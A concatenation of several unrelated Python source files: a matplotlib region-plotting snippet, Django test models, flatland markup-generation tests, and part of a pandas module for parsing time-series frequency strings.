roi[3] - roi[1], fill=False,
edgecolor='r', linewidth=3)
)
for sec_i in xrange(sec_rois.shape[0]):
plt.gca().add_patch(
plt.Rectangle((sec_rois[sec_i,1], sec_rois[sec_i,2]),
sec_rois[sec_i,3] - sec_rois[sec_i,1],
sec_rois[sec_i,4] - sec_rois[sec_i,2], fill=False,
edgecolor='g', linewidth=3)
)
plt.show()
|
|
import os
import tempfile
import uuid
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.fields.files import ImageField, ImageFieldFile
from django.db.models.fields.related import (
ForeignKey, ForeignObject, ManyToManyField, OneToOneField,
)
from django.utils import six
try:
from PIL import Image
except ImportError:
Image = None
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
def get_foo():
return Foo.objects.get(id=1)
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, default=get_foo, related_name=b'bars')
class Whiz(models.Model):
CHOICES = (
('Group 1', (
(1, 'First'),
(2, 'Second'),
)
),
('Group 2', (
(3, 'Third'),
(4, 'Fourth'),
)
),
(0, 'Other'),
)
c = models.IntegerField(choices=CHOICES, null=True)
class Counter(six.Iterator):
def __init__(self):
self.n = 1
def __iter__(self):
return self
def __next__(self):
if self.n > 5:
raise StopIteration
else:
self.n += 1
return (self.n, 'val-' + str(self.n))
class WhizIter(models.Model):
c = models.IntegerField(choices=Counter(), null=True)
class WhizIterEmpty(models.Model):
c = models.CharField(choices=(x for x in []), blank=True, max_length=1)
class BigD(models.Model):
d = models.DecimalField(max_digits=38, decimal_places=30)
class FloatModel(models.Model):
size = models.FloatField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class SmallIntegerModel(models.Model):
value = models.SmallIntegerField()
class IntegerModel(models.Model):
value = models.IntegerField()
class BigIntegerModel(models.Model):
value = models.BigIntegerField()
null_value = models.BigIntegerField(null=True, blank=True)
class PositiveSmallIntegerModel(models.Model):
value = models.PositiveSmallIntegerField()
class PositiveIntegerModel(models.Model):
value = models.PositiveIntegerField()
class Post(models.Model):
title = models.CharField(max_length=100)
body = models.TextField()
class NullBooleanModel(models.Model):
nbfield = models.NullBooleanField()
class BooleanModel(models.Model):
bfield = models.BooleanField(default=None)
string = models.CharField(max_length=10, default='abc')
class DateTimeModel(models.Model):
d = models.DateField()
dt = models.DateTimeField()
t = models.TimeField()
class DurationModel(models.Model):
field = models.DurationField()
class NullDurationModel(models.Model):
field = models.DurationField(null=True)
class PrimaryKeyCharModel(models.Model):
string = models.CharField(max_length=10, primary_key=True)
class FksToBooleans(models.Model):
"""Model with FKs to models with {Null,}BooleanField's, #15040"""
bf = models.ForeignKey(BooleanModel)
nbf = models.ForeignKey(NullBooleanModel)
class FkToChar(models.Model):
"""Model with FK to a model with a CharField primary key, #19299"""
out = models.ForeignKey(PrimaryKeyCharModel)
class RenamedField(models.Model):
modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),))
class VerboseNameField(models.Model):
id = models.AutoField("verbose pk", primary_key=True)
field1 = models.BigIntegerField("verbose field1")
field2 = models.BooleanField("verbose field2", default=False)
field3 = models.CharField("verbose field3", max_length=10)
field4 = models.CommaSeparatedIntegerField("verbose field4", max_length=99)
field5 = models.DateField("verbose field5")
field6 = models.DateTimeField("verbose field6")
field7 = models.DecimalField("verbose field7", max_digits=6, decimal_places=1)
field8 = models.EmailField("verbose field8")
field9 = models.FileField("verbose field9", upload_to="unused")
field10 = models.FilePathField("verbose field10")
field11 = models.FloatField("verbose field11")
# Don't want to depend on Pillow in this test
# field_image = models.ImageField("verbose field")
field12 = models.IntegerField("verbose field12")
field13 = models.IPAddressField("verbose field13")
field14 = models.GenericIPAddressField("verbose field14", protocol="ipv4")
field15 = models.NullBooleanField("verbose field15")
field16 = models.PositiveIntegerField("verbose field16")
field17 = models.PositiveSmallIntegerField("verbose field17")
field18 = models.SlugField("verbose field18")
field19 = models.SmallIntegerField("verbose field19")
field20 = models.TextField("verbose field20")
field21 = models.TimeField("verbose field21")
field22 = models.URLField("verbose field22")
field23 = models.UUIDField("verbose field23")
field24 = models.DurationField("verbose field24")
class GenericIPAddress(models.Model):
ip = models.GenericIPAddressField(null=True, protocol='ipv4')
###############################################################################
# These models aren't used in any test, just here to ensure they validate
# successfully.
# See ticket #16570.
class DecimalLessThanOne(models.Model):
d = models.DecimalField(max_digits=3, decimal_places=3)
# See ticket #18389.
class FieldClassAttributeModel(models.Model):
field_class = models.CharField
###############################################################################
class DataModel(models.Model):
short_data = models.BinaryField(max_length=10, default=b'\x08')
data = models.BinaryField()
###############################################################################
# FileField
class Document(models.Model):
myfile = models.FileField(upload_to='unused')
###############################################################################
# ImageField
# If Pillow available, do these tests.
if Image:
class TestImageFieldFile(ImageFieldFile):
"""
Custom Field File class that records whether or not the underlying file
was opened.
"""
def __init__(self, *args, **kwargs):
self.was_opened = False
super(TestImageFieldFile, self).__init__(*args, **kwargs)
def open(self):
self.was_opened = True
super(TestImageFieldFile, self).open()
class TestImageField(ImageField):
attr_class = TestImageFieldFile
# Set up a temp directory for file storage.
temp_storage_dir = tempfile.mkdtemp()
temp_storage = FileSystemStorage(temp_storage_dir)
temp_upload_to_dir = os.path.join(temp_storage.location, 'tests')
class Person(models.Model):
"""
Model that defines an ImageField with no dimension fields.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests')
class AbstractPersonWithHeight(models.Model):
"""
Abstract model that defines an ImageField with only one dimension field
to make sure the dimension update is correctly run on concrete subclass
instance post-initialization.
"""
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height')
mugshot_height = models.PositiveSmallIntegerField()
class Meta:
abstract = True
class PersonWithHeight(AbstractPersonWithHeight):
"""
Concrete model that subclass an abstract one with only on dimension
field.
"""
name = models.CharField(max_length=50)
class PersonWithHeightAndWidth(models.Model):
"""
Model that defines height and width fields after the ImageField.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
class PersonDimensionsFirst(models.Model):
"""
Model that defines height and width fields before the ImageField.
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
class PersonTwoImages(models.Model):
"""
Model that:
* Defines two ImageFields
* Defines the height/width fields before the ImageFields
* Has a nullable ImageField
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
headshot_height = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot_width = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot = TestImageField(blank=True, null=True,
storage=temp_storage, upload_to='tests',
height_field='headshot_height',
width_field='headshot_width')
class AllFieldsModel(models.Model):
big_integer = models.BigIntegerField()
binary = models.BinaryField()
boolean = models.BooleanField(default=False)
char = models.CharField(max_length=10)
csv = models.CommaSeparatedIntegerField(max_length=10)
date = models.DateField()
datetime = models.DateTimeField()
decimal = models.DecimalField(decimal_places=2, max_digits=2)
duration = models.DurationField()
email = models.EmailField()
file_path = models.FilePathField()
floatf = models.FloatField()
integer = models.IntegerField()
ip_address = models.IPAddressField()
generic_ip = models.GenericIPAddressField()
null_boolean = models.NullBooleanField()
positive_integer = models.PositiveIntegerField()
positive_small_integer = models.PositiveSmallIntegerField()
slug = models.SlugField()
small_integer = models.SmallIntegerField()
text = models.TextField()
time = models.TimeField()
url = models.URLField()
uuid = models.UUIDField()
fo = ForeignObject(
'self',
from_fields=['abstract_non_concrete_id'],
to_fields=['id'],
related_name='reverse'
)
fk = ForeignKey(
'self',
related_name='reverse2'
)
m2m = ManyToManyField('self')
oto = OneToOneField('self')
object_id = models.PositiveIntegerField()
content_type = models.ForeignKey(ContentType)
gfk = GenericForeignKey()
gr = GenericRelation(DataModel)
###############################################################################
class UUIDModel(models.Model):
field = models.UUIDField()
class NullableUUIDModel(models.Model):
field = models.UUIDField(blank=True, null=True)
class PrimaryKeyUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
class RelatedToUUIDModel(models.Model):
uuid_fk = models.ForeignKey('PrimaryKeyUUIDModel')
class UUIDChild(PrimaryKeyUUIDModel):
pass
class UUIDGrandchild(UUIDChild):
pass
|
|
from flatland import String
from tests._util import fails
from tests.markup._util import desired_output
schema = String.named(u'element').using(default=u'val').from_defaults
### value
@desired_output('html', schema)
def value_bound():
"""<div value="val"></div>"""
@value_bound.genshi_06
def test_value_bound_genshi_06():
"""<div form:bind="form" form:auto-value="on" />"""
@value_bound.genshi_05
def test_value_bound_genshi_05():
"""<div form:bind="form" form:auto-value="on" />"""
@value_bound.markup
def test_value_bound_markup(gen, el):
return gen.tag('div', el, auto_value=True)
@desired_output('html', None)
def value_unbound():
"""<div></div>"""
@value_unbound.genshi_06
def test_value_unbound_genshi_06():
"""<div form:auto-value="on" />"""
@value_unbound.genshi_05
def test_value_unbound_genshi_05():
"""<div form:auto-value="on" />"""
@value_unbound.markup
def test_value_unbound_markup(gen, el):
return gen.tag('div', auto_value=True)
### name
@desired_output('html', schema)
def name_bound():
"""<div name="element"></div>"""
@name_bound.genshi_06
def test_name_bound_genshi_06():
"""<div form:bind="form" form:auto-name="on" />"""
@name_bound.genshi_05
def test_name_bound_genshi_05():
"""<div form:bind="form" form:auto-name="on" />"""
@name_bound.markup
def test_name_bound_markup(gen, el):
return gen.tag('div', el, auto_name=True)
@desired_output('html', None)
def name_unbound():
"""<div></div>"""
@name_unbound.genshi_06
def test_name_unbound_genshi_06():
"""<div form:auto-name="on" />"""
@name_unbound.genshi_05
def test_name_unbound_genshi_05():
"""<div form:auto-name="on" />"""
@name_unbound.markup
def test_name_unbound_markup(gen, el):
return gen.tag('div', auto_name=True)
### domid
@desired_output('html', schema)
def domid_bound():
"""<div id="f_element"></div>"""
@domid_bound.genshi_06
def test_domid_bound_genshi_06():
"""<div form:bind="form" form:auto-domid="on" />"""
@domid_bound.genshi_05
def test_domid_bound_genshi_05():
"""<div form:bind="form" form:auto-domid="on" />"""
@domid_bound.markup
def test_domid_bound_markup(gen, el):
return gen.tag('div', el, auto_domid=True)
@desired_output('html', None)
def domid_unbound():
"""<div></div>"""
@domid_unbound.genshi_06
def test_domid_unbound_genshi_06():
"""<div form:auto-domid="on" />"""
@fails('<div id="None"></div>')
@domid_unbound.genshi_05
def test_domid_unbound_genshi_05():
"""<div form:auto-domid="on" />"""
@domid_unbound.markup
def test_domid_unbound_markup(gen, el):
return gen.tag('div', auto_domid=True)
### for
@desired_output('html', schema)
def for_bound():
"""<div for="f_element"></div>"""
@for_bound.genshi_06
def test_for_bound_genshi_06():
"""<div form:bind="form" form:auto-for="on" />"""
@for_bound.genshi_05
def test_for_bound_genshi_05():
"""<div form:bind="form" form:auto-for="on" />"""
@for_bound.markup
def test_for_bound_markup(gen, el):
return gen.tag('div', el, auto_for=True)
@desired_output('html', None)
def for_unbound():
"""<div></div>"""
@for_unbound.genshi_06
def test_for_unbound_genshi_06():
"""<div form:auto-for="on" />"""
@for_unbound.genshi_05
def test_for_unbound_genshi_05():
"""<div form:auto-for="on" />"""
@for_unbound.markup
def test_for_unbound_markup(gen, el):
return gen.tag('div', auto_for=True)
### tabindex
@desired_output('html', schema)
def tabindex_bound():
"""<div tabindex="1"></div>"""
@tabindex_bound.genshi_06
def test_tabindex_bound_genshi_06():
"""
<form:set tabindex="1"/>
<div form:bind="form" form:auto-tabindex="on" />
"""
@tabindex_bound.genshi_05
def test_tabindex_bound_genshi_05():
"""
<form:set tabindex="1"/>
<div form:bind="form" form:auto-tabindex="on" />
"""
@tabindex_bound.markup
def test_tabindex_bound_markup(gen, el):
gen.set(tabindex=1)
return gen.tag('div', el, auto_tabindex=True)
@desired_output('html', None)
def tabindex_unbound():
"""<div tabindex="1"></div>"""
@tabindex_unbound.genshi_06
def test_tabindex_unbound_genshi_06():
"""
<form:set tabindex="1"/>
<div form:auto-tabindex="on" />
"""
@tabindex_unbound.genshi_05
def test_tabindex_unbound_genshi_05():
"""
<form:set tabindex="1"/>
<div form:auto-tabindex="on" />
"""
@tabindex_unbound.markup
def test_tabindex_unbound_markup(gen, el):
gen.set(tabindex=1)
return gen.tag('div', auto_tabindex=True)
### combo
@desired_output('html', schema)
def combo_unbound():
"""<div tabindex="1"></div>"""
@combo_unbound.genshi_06
def test_combo_unbound_genshi_06():
"""
<form:set tabindex="1"/>
<div form:auto-tabindex="on" form:auto-domid="on" />
"""
@fails('<div tabindex="1" id="None"></div>')
@combo_unbound.genshi_05
def test_combo_unbound_genshi_05():
"""
<form:set tabindex="1"/>
<div form:auto-tabindex="on" form:auto-domid="on" />
"""
@combo_unbound.markup
def test_combo_unbound_markup(gen, el):
gen.set(tabindex=1)
return gen.tag('div', auto_tabindex=True, auto_domid=True)
|
|
from datetime import datetime
from pandas.compat import range, long, zip
from pandas import compat
import re
import numpy as np
from pandas.core.algorithms import unique
from pandas.tseries.offsets import DateOffset
from pandas.util.decorators import cache_readonly
import pandas.tseries.offsets as offsets
import pandas.core.common as com
import pandas.lib as lib
import pandas.tslib as tslib
class FreqGroup(object):
FR_ANN = 1000
FR_QTR = 2000
FR_MTH = 3000
FR_WK = 4000
FR_BUS = 5000
FR_DAY = 6000
FR_HR = 7000
FR_MIN = 8000
FR_SEC = 9000
FR_MS = 10000
FR_US = 11000
FR_NS = 12000
class Resolution(object):
RESO_US = tslib.US_RESO
RESO_MS = tslib.MS_RESO
RESO_SEC = tslib.S_RESO
RESO_MIN = tslib.T_RESO
RESO_HR = tslib.H_RESO
RESO_DAY = tslib.D_RESO
_reso_str_map = {
RESO_US: 'microsecond',
RESO_MS: 'millisecond',
RESO_SEC: 'second',
RESO_MIN: 'minute',
RESO_HR: 'hour',
RESO_DAY: 'day'}
_str_reso_map = dict([(v, k) for k, v in compat.iteritems(_reso_str_map)])
_reso_freq_map = {
'year': 'A',
'quarter': 'Q',
'month': 'M',
'day': 'D',
'hour': 'H',
'minute': 'T',
'second': 'S',
'millisecond': 'L',
'microsecond': 'U',
'nanosecond': 'N'}
_freq_reso_map = dict([(v, k) for k, v in compat.iteritems(_reso_freq_map)])
@classmethod
def get_str(cls, reso):
return cls._reso_str_map.get(reso, 'day')
@classmethod
def get_reso(cls, resostr):
return cls._str_reso_map.get(resostr, cls.RESO_DAY)
@classmethod
def get_freq(cls, resostr):
return cls._reso_freq_map[resostr]
@classmethod
def get_str_from_freq(cls, freq):
return cls._freq_reso_map.get(freq, 'day')
@classmethod
def get_reso_from_freq(cls, freq):
return cls.get_reso(cls.get_str_from_freq(freq))
def get_reso_string(reso):
return Resolution.get_str(reso)
def get_to_timestamp_base(base):
if base < FreqGroup.FR_BUS:
return FreqGroup.FR_DAY
if FreqGroup.FR_HR <= base <= FreqGroup.FR_SEC:
return FreqGroup.FR_SEC
return base
def get_freq_group(freq):
if isinstance(freq, compat.string_types):
base, mult = get_freq_code(freq)
freq = base
return (freq // 1000) * 1000
def get_freq(freq):
if isinstance(freq, compat.string_types):
base, mult = get_freq_code(freq)
freq = base
return freq
def get_freq_code(freqstr):
"""
Parameters
----------
Returns
-------
"""
if isinstance(freqstr, DateOffset):
freqstr = (get_offset_name(freqstr), freqstr.n)
if isinstance(freqstr, tuple):
if (com.is_integer(freqstr[0]) and
com.is_integer(freqstr[1])):
# e.g., freqstr = (2000, 1)
return freqstr
else:
# e.g., freqstr = ('T', 5)
try:
code = _period_str_to_code(freqstr[0])
stride = freqstr[1]
except:
if com.is_integer(freqstr[1]):
raise
code = _period_str_to_code(freqstr[1])
stride = freqstr[0]
return code, stride
if com.is_integer(freqstr):
return (freqstr, 1)
base, stride = _base_and_stride(freqstr)
code = _period_str_to_code(base)
return code, stride
def _get_freq_str(base, mult=1):
code = _reverse_period_code_map.get(base)
if mult == 1:
return code
return str(mult) + code
#----------------------------------------------------------------------
# Offset names ("time rules") and related functions
from pandas.tseries.offsets import (Nano, Micro, Milli, Second, Minute, Hour,
Day, BDay, CDay, Week, MonthBegin,
MonthEnd, BMonthBegin, BMonthEnd,
QuarterBegin, QuarterEnd, BQuarterBegin,
BQuarterEnd, YearBegin, YearEnd,
BYearBegin, BYearEnd, _make_offset
)
try:
cday = CDay()
except NotImplementedError:
cday = None
#: cache of previously seen offsets
_offset_map = {}
_offset_to_period_map = {
'WEEKDAY': 'D',
'EOM': 'M',
'BM': 'M',
'BQS': 'Q',
'QS': 'Q',
'BQ': 'Q',
'BA': 'A',
'AS': 'A',
'BAS': 'A',
'MS': 'M',
'D': 'D',
'C': 'C',
'B': 'B',
'T': 'T',
'S': 'S',
'L': 'L',
'U': 'U',
'N': 'N',
'H': 'H',
'Q': 'Q',
'A': 'A',
'W': 'W',
'M': 'M'
}
need_suffix = ['QS', 'BQ', 'BQS', 'AS', 'BA', 'BAS']
_months = ['JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP',
'OCT', 'NOV', 'DEC']
for __prefix in need_suffix:
for _m in _months:
_offset_to_period_map['%s-%s' % (__prefix, _m)] = \
_offset_to_period_map[__prefix]
for __prefix in ['A', 'Q']:
for _m in _months:
_alias = '%s-%s' % (__prefix, _m)
_offset_to_period_map[_alias] = _alias
_days = ['MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT', 'SUN']
for _d in _days:
_offset_to_period_map['W-%s' % _d] = 'W-%s' % _d
def get_period_alias(offset_str):
""" alias to closest period strings BQ->Q etc"""
return _offset_to_period_map.get(offset_str, None)
_rule_aliases = {
# Legacy rules that will continue to map to their original values
# essentially for the rest of time
'WEEKDAY': 'B',
'EOM': 'BM',
'W@MON': 'W-MON',
'W@TUE': 'W-TUE',
'W@WED': 'W-WED',
'W@THU': 'W-THU',
'W@FRI': 'W-FRI',
'W@SAT': 'W-SAT',
'W@SUN': 'W-SUN',
'W': 'W-SUN',
'Q@JAN': 'BQ-JAN',
'Q@FEB': 'BQ-FEB',
'Q@MAR': 'BQ-MAR',
'Q': 'Q-DEC',
'A': 'A-DEC', # YearEnd(month=12),
'AS': 'AS-JAN', # YearBegin(month=1),
'BA': 'BA-DEC', # BYearEnd(month=12),
'BAS': 'BAS-JAN', # BYearBegin(month=1),
'A@JAN': 'BA-JAN',
'A@FEB': 'BA-FEB',
'A@MAR': 'BA-MAR',
'A@APR': 'BA-APR',
'A@MAY': 'BA-MAY',
'A@JUN': 'BA-JUN',
'A@JUL': 'BA-JUL',
'A@AUG': 'BA-AUG',
'A@SEP': 'BA-SEP',
'A@OCT': 'BA-OCT',
'A@NOV': 'BA-NOV',
'A@DEC': 'BA-DEC',
# lite aliases
'Min': 'T',
'min': 'T',
'ms': 'L',
'us': 'U'
}
#TODO: Can this be killed?
for _i, _weekday in enumerate(['MON', 'TUE', 'WED', 'THU', 'FRI']):
for _iweek in range(4):
_name = 'WOM-%d%s' % (_iweek + 1, _weekday)
_rule_aliases[_name.replace('-', '@')] = _name
# Note that _rule_aliases is not 1:1 (d[BA]==d[A@DEC]), and so traversal
# order matters when constructing an inverse. we pick one. #2331
_legacy_reverse_map = dict((v, k) for k, v in
reversed(sorted(compat.iteritems(_rule_aliases))))
def to_offset(freqstr):
"""
Return DateOffset object from string representation
Examples
--------
>>> to_offset('5Min')
Minute(5)
"""
if freqstr is None:
return None
if isinstance(freqstr, DateOffset):
return freqstr
if isinstance(freqstr, tuple):
name = freqstr[0]
stride = freqstr[1]
if isinstance(stride, compat.string_types):
name, stride = stride, name
name, _ = _base_and_stride(name)
delta = get_offset(name) * stride
else:
delta = None
stride_sign = None
try:
for stride, name, _ in opattern.findall(freqstr):
offset = get_offset(name)
if stride_sign is None:
stride_sign = -1 if stride.startswith('-') else 1
if not stride:
stride = 1
stride = int(stride)
offset = offset * int(np.fabs(stride) * stride_sign)
if delta is None:
delta = offset
else:
delta = delta + offset
except Exception:
raise ValueError("Could not evaluate %s" % freqstr)
if delta is None:
raise ValueError('Unable to understand %s as a frequency' % freqstr)
return delta
# hack to handle WOM-1MON
opattern = re.compile(r'([\-]?\d*)\s*([A-Za-z]+([\-@][\dA-Za-z\-]+)?)')
def _base_and_stride(freqstr):
"""
Return base freq and stride info from string representation
Examples
--------
_freq_and_stride('5Min') -> 'Min', 5
"""
groups = opattern.match(freqstr)
if not groups:
raise ValueError("Could not evaluate %s" % freqstr)
stride = groups.group(1)
if len(stride):
stride = int(stride)
else:
stride = 1
base = groups.group(2)
return (base, stride)
def get_base_alias(freqstr):
"""
Returns the base frequency alias, e.g., '5D' -> 'D'
"""
return _base_and_stride(freqstr)[0]
_dont_uppercase = set(('MS', 'ms'))
def get_offset(name):
"""
Return DateOffset object associated with rule name
Examples
--------
get_offset('EOM') --> BMonthEnd(1)
"""
if name not in _dont_uppercase:
name = name.upper()
if name in _rule_aliases:
name = _rule_aliases[name]
elif name.lower() in _rule_aliases:
name = _rule_aliases[name.lower()]
else:
if name in _rule_aliases:
name = _rule_aliases[name]
if name not in _offset_map:
try:
# generate and cache offset
offset = _make_offset(name)
except (ValueError, TypeError, KeyError):
# bad prefix or suffix
raise ValueError('Bad rule name requested: %s.' % name)
_offset_map[name] = offset
return _offset_map[name]
getOffset = get_offset
def get_offset_name(offset):
"""
Return rule name associated with a DateOffset object
Examples
--------
get_offset_name(BMonthEnd(1)) --> 'EOM'
"""
if offset is None:
raise ValueError("Offset can't be none!")
# Hack because this is what it did before...
if isinstance(offset, BDay):
if offset.n != 1:
raise ValueError('Bad rule given: %s.' % 'BusinessDays')
else:
return offset.rule_code
try:
return offset.freqstr
except AttributeError:
# Bad offset, give useful error.
raise ValueError('Bad rule given: %s.' % offset)
def get_legacy_offset_name(offset):
"""
Return the pre pandas 0.8.0 name for the date offset
"""
name = offset.name
return _legacy_reverse_map.get(name, name)
def get_standard_freq(freq):
"""
Return the standardized frequency string
"""
if freq is None:
return None
if isinstance(freq, DateOffset):
return get_offset_name(freq)
code, stride = get_freq_code(freq)
return _get_freq_str(code, stride)
#----------------------------------------------------------------------
# Period codes
# period frequency constants corresponding to scikits timeseries
# originals
_period_code_map = {
# Annual freqs with various fiscal year ends.
# eg, 2005 for A-FEB runs Mar 1, 2004 to Feb 28, 2005
"A-DEC": 1000, # Annual - December year end
"A-JAN": 1001, # Annual - January year end
"A-FEB": 1002, # Annual - February year end
"A-MAR": 1003, # Annual - March year end
"A-APR": 1004, # Annual - April year end
"A-MAY": 1005, # Annual - May year end
"A-JUN": 1006, # Annual - June year end
"A-JUL": 1007, # Annual - July year end
"A-AUG": 1008, # Annual - August year end
"A-SEP": 1009, # Annual - September year end
"A-OCT": 1010, # Annual - October year end
"A-NOV": 1011, # Annual - November year end
# Quarterly frequencies with various fiscal year ends.
# eg, Q42005 for Q-OCT runs Aug 1, 2005 to Oct 31, 2005
"Q-DEC": 2000, # Quarterly - December year end
"Q-JAN": 2001, # Quarterly - January year end
"Q-FEB": 2002, # Quarterly - February year end
"Q-MAR": 2003, # Quarterly - March year end
"Q-APR": 2004, # Quarterly - April year end
"Q-MAY": 2005, # Quarterly - May year end
"Q-JUN": 2006, # Quarterly - June year end
"Q-JUL": 2007, # Quarterly - July year end
"Q-AUG": 2008, # Quarterly - August year end
"Q-SEP": 2009, # Quarterly - September year end
"Q-OCT": 2010, # Quarterly - October year end
"Q-NOV": 2011, # Quarterly - November year end
"M": 3000, # Monthly
"W-SUN": 4000, # Weekly - Sunday end of week
"W-MON": 4001, # Weekly - Monday end of week
"W-TUE": 4002, # Weekly - Tuesday end of week
"W-WED": 4003, # Weekly - Wednesday end of week
"W-THU": 4004, # Weekly - Thursday end of week
"W-FRI": 4005, # Weekly - Friday end of week
"W-SAT": 4006, # Weekly - Saturday end of week
"B": 5000, # Business days
"D": 6000, # Daily
"H": 7000, # Hourly
"T": 8000, # Minutely
"S": 9000, # Secondly
"L": 10000, # Millisecondly
"U": 11000, # Microsecondly
"N": 12000, # Nanosecondly
}
_reverse_period_code_map = {}
for _k, _v in compat.iteritems(_period_code_map):
_reverse_period_code_map[_v] = _k
# Additional aliases
_period_code_map.update({
"Q": 2000, # Quarterly - December year end (default quarterly)
"A": 1000, # Annual
"W": 4000, # Weekly
})
def _period_alias_dictionary():
"""
Build freq alias dictionary to support freqs from original c_dates.c file
of the scikits.timeseries library.
"""
alias_dict = {}
M_aliases = ["M", "MTH", "MONTH", "MONTHLY"]
B_aliases = ["B", "BUS", "BUSINESS", "BUSINESSLY", 'WEEKDAY']
D_aliases = ["D", "DAY", "DLY", "DAILY"]
H_aliases = ["H", "HR", "HOUR", "HRLY", "HOURLY"]
T_aliases = ["T", "MIN", "MINUTE", "MINUTELY"]
S_aliases = ["S", "SEC", "SECOND", "SECONDLY"]
L_aliases = ["L", "ms", "MILLISECOND", "MILLISECONDLY"]
U_aliases = ["U", "US", "MICROSECOND", "MICROSECONDLY"]
N_aliases = ["N", "NS", "NANOSECOND", "NANOSECONDLY"]
for k in M_aliases:
alias_dict[k] = 'M'
for k in B_aliases:
alias_dict[k] = 'B'
for k in D_aliases:
alias_dict[k] = 'D'
for k in H_aliases:
alias_dict[k] = 'H'
for k in T_aliases:
alias_dict[k] = 'Min'
for k in S_aliases:
alias_dict[k] = 'S'
for k in L_aliases:
alias_dict[k] = 'L'
for k in U_aliases:
alias_dict[k] = 'U'
for k in N_aliases:
alias_dict[k] = 'N'
A_prefixes = ["A", "Y", "ANN", "ANNUAL", "ANNUALLY", "YR", "YEAR",
"YEARLY"]
Q_prefixes = ["Q", "QTR", "QUARTER", "QUARTERLY", "Q-E",
"QTR-E", "QUARTER-E", "QUARTERLY-E"]
month_names = [
["DEC", "DECEMBER"],
["JAN", "JANUARY"],
["FEB", "FEBRUARY"],
["MAR", "MARCH"],
["APR", "APRIL"],
["MAY", "MAY"],
["JUN", "JUNE"],
["JUL", "JULY"],
["AUG", "AUGUST"],
["SEP", "SEPTEMBER"],
["OCT", "OCTOBER"],
["NOV", "NOVEMBER"]]
seps = ["@", "-"]
for k in A_prefixes:
alias_dict[k] = 'A'
for m_tup in month_names:
for sep in seps:
m1, m2 = m_tup
alias_dict[k + sep + m1] = 'A-' + m1
alias_dict[k + sep + m2] = 'A-' + m1
for k in Q_prefixes:
alias_dict[k] = 'Q'
for m_tup in month_names:
for sep in seps:
m1, m2 = m_tup
alias_dict[k + sep + m1] = 'Q-' + m1
alias_dict[k + sep + m2] = 'Q-' + m1
W_prefixes = ["W", "WK", "WEEK", "WEEKLY"]
day_names = [
["SUN", "SUNDAY"],
["MON", "MONDAY"],
["TUE", "TUESDAY"],
["WED", "WEDNESDAY"],
["THU", "THURSDAY"],
["FRI", "FRIDAY"],
["SAT", "SATURDAY"]]
for k in W_prefixes:
alias_dict[k] = 'W'
for d_tup in day_names:
for sep in ["@", "-"]:
d1, d2 = d_tup
alias_dict[k + sep + d1] = 'W-' + d1
alias_dict[k + sep + d2] = 'W-' + d1
return alias_dict
def _infer_period_group(freqstr):
return _period_group(Resolution._reso_freq_map[freqstr])
def _period_group(freqstr):
base, mult = get_freq_code(freqstr)
return base // 1000 * 1000
_period_alias_dict = _period_alias_dictionary()
def _period_str_to_code(freqstr):
# hack
freqstr = _rule_aliases.get(freqstr, freqstr)
if freqstr not in _dont_uppercase:
freqstr = _rule_aliases.get(freqstr.lower(), freqstr)
try:
if freqstr not in _dont_uppercase:
freqstr = freqstr.upper()
return _period_code_map[freqstr]
except KeyError:
try:
alias = _period_alias_dict[freqstr]
except KeyError:
raise ValueError("Unknown freqstr: %s" % freqstr)
return _period_code_map[alias]
def infer_freq(index, warn=True):
"""
Infer the most likely frequency given the input index. If the frequency is
uncertain, a warning will be printed
Parameters
----------
index : DatetimeIndex
if passed a Series will use the values of the series (NOT THE INDEX)
warn : boolean, default True
Returns
-------
freq : string or None
None if no discernible frequency
TypeError if the index is not datetime-like
"""
import pandas as pd
if isinstance(index, com.ABCSeries):
values = index.values
if not (com.is_datetime64_dtype(index.values) or com.is_timedelta64_dtype(index.values) or values.dtype == object):
raise TypeError("cannot infer freq from a non-convertible dtype on a Series of {0}".format(index.dtype))
index = values
if com.is_period_arraylike(index):
raise TypeError("PeriodIndex given. Check the `freq` attribute "
"instead of using infer_freq.")
elif isinstance(index, pd.TimedeltaIndex):
inferer = _TimedeltaFrequencyInferer(index, warn=warn)
return inferer.get_freq()
if isinstance(index, pd.Index) and not isinstance(index, pd.DatetimeIndex):
if isinstance(index, (pd.Int64Index, pd.Float64Index)):
raise TypeError("cannot infer freq from a non-convertible index type {0}".format(type(index)))
index = index.values
index = pd.DatetimeIndex(index)
inferer = _FrequencyInferer(index, warn=warn)
return inferer.get_freq()
_ONE_MICRO = long(1000)
_ONE_MILLI = _ONE_MICRO * 1000
_ONE_SECOND = _ONE_MILLI * 1000
_ONE_MINUTE = 60 * _ONE_SECOND
_ONE_HOUR = 60 * _ONE_MINUTE
_ONE_DAY = 24 * _ONE_HOUR
class _FrequencyInferer(object):
"""
Not sure if I can avoid the state machine here
"""
def __init__(self, index, warn=True):
self.index = index
self.values = np.asarray(index).view('i8')
# This moves the values, which are implicitly in UTC, to the
# the timezone so they are in local time
if hasattr(index,'tz'):
if index.tz is not None:
self.values = tslib.tz_convert(self.values, 'UTC', index.tz)
self.warn = warn
if len(index) < 3:
raise ValueError('Need at least 3 dates to infer frequency')
